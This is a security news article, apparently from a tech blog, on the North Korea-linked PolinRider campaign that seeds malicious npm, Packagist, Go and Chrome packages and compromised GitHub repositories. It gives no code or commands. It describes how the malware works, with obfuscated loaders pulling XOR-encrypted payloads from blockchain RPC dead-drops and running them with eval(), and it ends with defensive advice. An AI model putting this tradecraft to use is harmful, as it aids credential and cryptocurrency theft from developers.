North Korea’s developer-targeting machine has industrialized. Threat actors linked to the long-running Contagious Interview operation have published 108 unique malicious packages and browser extensions across npm, Packagist, Go, and Google Chrome, as part of an ongoing campaign researchers call PolinRider. The packages hide obfuscated JavaScript loaders that reach out to public blockchain infrastructure for their real payload — and the goal is what it always is for this actor: developer credentials, browser secrets, and cryptocurrency.
Reported by The Hacker News and detailed by Socket’s threat research team, the 108 packages span 162 malicious release artifacts across multiple versions, broken down as 19 npm libraries, 10 Composer (Packagist) packages, 61 Go modules, and one Chrome extension. The campaign is not a one-time dump — it’s a sustained supply-chain seeding operation that keeps regenerating as maintainer accounts fall.
Malware Hidden Behind the Blockchain
The technical design is what elevates PolinRider above generic typosquatting. Each malicious package ships an obfuscated JavaScript loader. After deobfuscation, the loader doesn’t hardcode a command-and-control server — instead, in many cases it reaches out to blockchain and public RPC infrastructure, including TRON, Aptos, and BNB Smart Chain services, to retrieve encrypted second-stage payload material. It then decrypts that material with embedded XOR keys and executes the result with eval().
Using public blockchain RPC endpoints as a dead-drop for payloads is clever tradecraft. Blockchain traffic is legitimate, ubiquitous, and hard to block wholesale — a developer’s machine talking to a TRON RPC node looks like Web3 development, not malware C2. It also gives the attackers a censorship-resistant, hard-to-take-down delivery channel that survives domain seizures.
The follow-on payloads observed include DEV#POPPER and OmniStealer, delivering the full North Korean developer-theft kit: command execution, socket.io-client-based C2, credential theft, browser-data theft, and wallet exfiltration.
The Scale Behind the 108 Packages
The published packages are only the storefront. Underneath, PolinRider is a mass GitHub-compromise operation. First flagged by the OpenSourceMalware team in March 2026, the campaign implants obfuscated JavaScript payloads across hundreds of public GitHub repositories to deliver a new variant of BeaverTail, the JavaScript malware that has been Contagious Interview’s signature for over a year.
As of April 11, 2026, the activity had compromised 1,951 public GitHub repositories belonging to 1,047 unique owners. It has also merged with a cluster called TaskJacker, which drops malicious VS Code task files into victims’ existing repositories — turning a developer’s own editor configuration into an execution trigger.
The infection method is self-sustaining: attackers compromise maintainer accounts, modify legitimate repositories, and publish infected package versions wherever they retain or obtain registry access. Take down one package and another appears under a different compromised account. Socket and the registries are playing whack-a-mole against an actor that treats package publication as a renewable resource.
Why North Korea Keeps Coming for Developers
This is not opportunistic crime — it’s a state revenue and espionage program. The Contagious Interview operation has spent well over a year targeting software developers specifically, often through fake job interviews in which candidates are asked to run “coding assignments” laced with malware. PolinRider is the supply-chain flank of the same effort: instead of luring individual developers, it poisons the packages developers install by the thousand.
The payoff is layered. A compromised developer machine yields cryptocurrency (directly funding a sanctioned regime), cloud and CI/CD credentials (enabling deeper supply-chain attacks against the developer’s employer), and a foothold in software organizations that can be sold or escalated. We’ve documented this actor’s reach repeatedly — from malicious JetBrains plugins stealing AI API keys to the Axios npm supply-chain RAT and the LiteLLM PyPI compromise. The open-source registry is now a standing battlefield.
Defending Against Package-Level Compromise
- Pin and verify dependencies. Lockfiles, integrity hashes, and pinned versions blunt the “compromised maintainer pushes a malicious patch” vector that PolinRider depends on. Don’t auto-update transitive dependencies into production.
- Watch for install-time and postinstall scripts that reach out to unexpected endpoints — including blockchain RPC nodes, which have no business in most build pipelines.
- Use software composition analysis (Socket, Trivy, and similar) that inspects package behavior, not just known-CVE lists — PolinRider packages are novel, so signature-only scanning misses them.
- Isolate development and build environments. Developer machines with wallet access, cloud credentials, and production reach are the highest-value targets on the network; treat them accordingly.
- Be maximally suspicious of “interview” coding tasks. If a prospective employer asks you to run unfamiliar code on your personal machine, that is the Contagious Interview playbook — run it in a disposable VM or not at all.
The Bottom Line
One hundred and eight malicious packages, nearly 2,000 poisoned repositories, and a blockchain-hosted payload channel that resists takedown — PolinRider is what a well-resourced state actor’s supply-chain program looks like when it matures. The registries will keep pulling packages and the attackers will keep publishing them. For developers, the only durable defense is to stop treating “it’s on npm” or “it’s on GitHub” as any kind of trust signal at all.
Sources
- The Hacker News — North Korean Hackers Publish 108 Malicious Packages and Extensions in PolinRider Campaign
- Socket — PolinRider: North Korea-Linked Supply Chain Campaign Expands
- Developer-Tech — PolinRider supply chain attack expands to Packagist ecosystem
- GBHackers — Hackers Compromise GitHub Maintainer Accounts to Publish PolinRider-Infected Package Versions



